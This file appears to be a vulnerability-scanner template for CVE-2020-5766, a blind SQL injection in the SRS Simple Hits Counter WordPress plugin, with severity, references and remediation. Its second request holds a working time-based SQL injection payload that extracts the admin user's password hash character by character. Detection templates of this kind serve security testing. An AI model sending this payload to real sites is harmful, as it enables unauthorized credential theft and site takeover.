id: CVE-2020-5766 info: name: SRS Simple Hits Counter 1.0.3-1.0.4 - Unauthenticated Blind SQL Injection author: DhiyaneshDk severity: high description: | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in SRS Simple Hits Counter Plugin for WordPress 1.0.3 and 1.0.4 allows a remote, unauthenticated attacker to determine the value of database fields. impact: | Unauthenticated attackers can extract database contents via blind SQL injection, potentially exposing sensitive WordPress user data and credentials. remediation: | Update to the latest version of SRS Simple Hits Counter plugin. reference: - https://github.com/tenable/poc/blob/master/WordPress/plugins/SRS_Simple_Hits_Counter/blind_sqli_tra_2020_42.py - https://www.tenable.com/security/research/tra-2020-42 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-5766 cwe-id: CWE-89 epss-score: 0.06052 epss-percentile: 0.92486 cpe: cpe:2.3:a:srs_simple_hits_counter_project:srs_simple_hits_counter:1.0.3:*:*:*:*:wordpress:*:* metadata: vendor: srs_simple_hits_counter_project product: srs_simple_hits_counter framework: wordpress publicwww-query: "/wp-content/plugins/srs-simple-hits-counter/" tags: cve,cve2020,srs-simple-hits-counter,wordpress,wp,wp-plugin,time-based-sqli,sqli,vkev,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "/wp-content/plugins/srs-simple-hits-counter")' - 'status_code == 200' condition: and internal: true - raw: - | @timeout 20s GET /wp-admin/admin-ajax.php?action=srs_update_counter&post_id=1+and+1=0)+union+select+(select+if(ascii(substring((select+user_pass+from+wp_users+where+user_login=char(97,100,109,105,110)),%d,1))=%d,sleep(6),sleep(0))),1,1,1,1,1;-- HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=6' # digest: 4a0a0047304502205ec89e23830e527ef955475499aea75141510e36d317b299dcc84f50ca25ea41022100c094e1418134a02837cde53feb474fac967a0bc5badec7729d72696b1755fb7b:922c64590222798bb761d5b6d8e72950